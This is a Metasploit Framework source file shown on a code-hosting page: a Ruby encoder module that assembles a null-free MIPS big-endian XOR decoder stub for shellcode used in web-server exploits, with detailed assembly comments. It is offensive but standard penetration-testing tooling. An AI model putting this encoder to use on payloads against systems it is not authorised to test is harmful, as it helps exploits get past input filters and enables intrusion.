Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/mipsbe/longxor.rb
19670 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'metasm'
7
8
class MetasploitModule < Msf::Encoder::Xor
9
10
def initialize
11
super(
12
'Name' => 'XOR Encoder',
13
'Description' => %q{
14
Mips Web server exploit friendly xor encoder.
15
},
16
'Author' => [
17
'Julien Tinnes <julien[at]cr0.org>', # original shellcode
18
'Pedro Ribeiro <[email protected]>', # fix Linux >= 2.6.11 and toupper() compat
19
],
20
'Arch' => ARCH_MIPSBE,
21
'License' => MSF_LICENSE,
22
'Decoder' => {
23
'KeySize' => 4,
24
'BlockSize' => 4,
25
'KeyPack' => 'N'
26
})
27
end
28
29
#
30
# Returns the decoder stub that is adjusted for the size of the buffer
31
# being encoded.
32
#
33
def decoder_stub(state)
34
# add one xor operation for the key (see comment below)
35
number_of_passes = state.buf.length / 4 + 1
36
raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if number_of_passes > 10240
37
raise EncodingError, "The payload is not padded to 4-bytes (#{state.buf.length} bytes)" if state.buf.length % 4 != 0
38
39
# 16-bits not (again, see below)
40
reg_10 = (number_of_passes + 1) ^ 0xFFFF
41
reg_5 = state.buf.length ^ 0xFFFF
42
decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<~EOS).encoded.data
43
;
44
; MIPS nul-free xor decoder
45
;
46
; (C) 2006 Julien TINNES
47
; <julien at cr0.org>
48
;
49
; The first four bytes in encoded shellcode must be the xor key
50
; This means that you have to put the xor key right after
51
; this xor decoder
52
; This key will be considered part of the encoded shellcode
53
; by this decoder and will be xored, thus becoming 4NULs, meaning nop
54
;
55
; This is Linux-only because I use the cacheflush system call
56
;
57
; You can use shellforge to assemble this, but be sure to discard all
58
; the nul bytes at the end (everything after x01\\x4a\\x54\\x0c)
59
;
60
; change 2 bytes in the first instruction's opcode with the number of passes
61
; the number of passes is the number of xor operations to apply, which should be
62
; 1 (for the key) + the number of 4-bytes words you have in your shellcode
63
; you must encode ~(number_of_passes + 1) (to ensure that you're nul-free)
64
65
66
;.text
67
;.align 2
68
;.globl main
69
;.ent main
70
;.type main,@function
71
72
main:
73
74
li macro reg, imm
75
; lui reg, ((imm) >> 16) & 0ffffh
76
; ori reg, reg, (imm) & 0ffffh
77
addiu reg, $0, imm ; sufficient if imm.abs <= 0x7fff
78
endm
79
80
li( $10, #{reg_10}) ; load number of passes ^ 0xffff
81
nor $10, $10, $0 ; put number of passes in $10
82
83
li( $11,-89) ; addend to calculated PC is 73
84
;.set noreorder
85
next:
86
bltzal $8, next
87
;.set reorder
88
slti $8, $0, 0x8282
89
nor $11, $11, $0 ; addend in $9
90
addu $25, $31, $11 ; $25 points to encoded shellcode +4
91
addu $16, $31, $11 ; $16 too (used to set up the cacheflush() arg down below)
92
93
; lui $2, 0xDDDD ; first part of the xor (old method)
94
slti $23, $0, 0x8282 ; store 0 in $23 (our counter)
95
; ori $17, $2, 0xDDDD ; second part of the xor (old method)
96
lw $17, -4($25) ; load xor key in $17
97
98
99
li( $9, -5)
100
nor $9, $9, $0 ; 4 in $9
101
102
addi $15, $9, -3 ; 1 in $15
103
loop:
104
lw $8, -4($25)
105
106
addu $23, $23, $15 ; increment counter
107
xor $3, $8, $17
108
sltu $30, $23, $10 ; enough loops?
109
sw $3, -4($25)
110
addi $6, $9, -1 ; 3 in $6 (for cacheflush)
111
bne $0, $30, loop
112
addu $25, $25, $9 ; next instruction to decode :)
113
114
115
addiu $4, $16, -4 ; cacheflush() addr parameter
116
li( $10,#{reg_5}) ; cacheflush() nbytes parameter
117
nor $5, $10, $0 ; same as above
118
; li $6,3 ; $6 is set above, 3rd arg for cacheflush()
119
120
; .set noreorder
121
li( $2, 4147) ; cacheflush
122
; .ascii "\\x01JT\\x0c" ; nul-free syscall
123
syscall 0x52950
124
; .set reorder
125
126
127
; write last decoder opcode and decoded shellcode
128
; li $4,1 ; stdout
129
; addi $5, $16, -8
130
; li $6,40 ; how much to write
131
; .set noreorder
132
; li $2, 4004 ; write
133
; syscall
134
; .set reorder
135
136
137
nop ; encoded shellcoded must be here (xor key right here ;)
138
; $t9 (aka $25) points here
139
140
EOS
141
# put the key at the end of the decoder
142
state.decoder_key_offset = decoder.length - 4
143
144
return decoder
145
end
146
end
147
148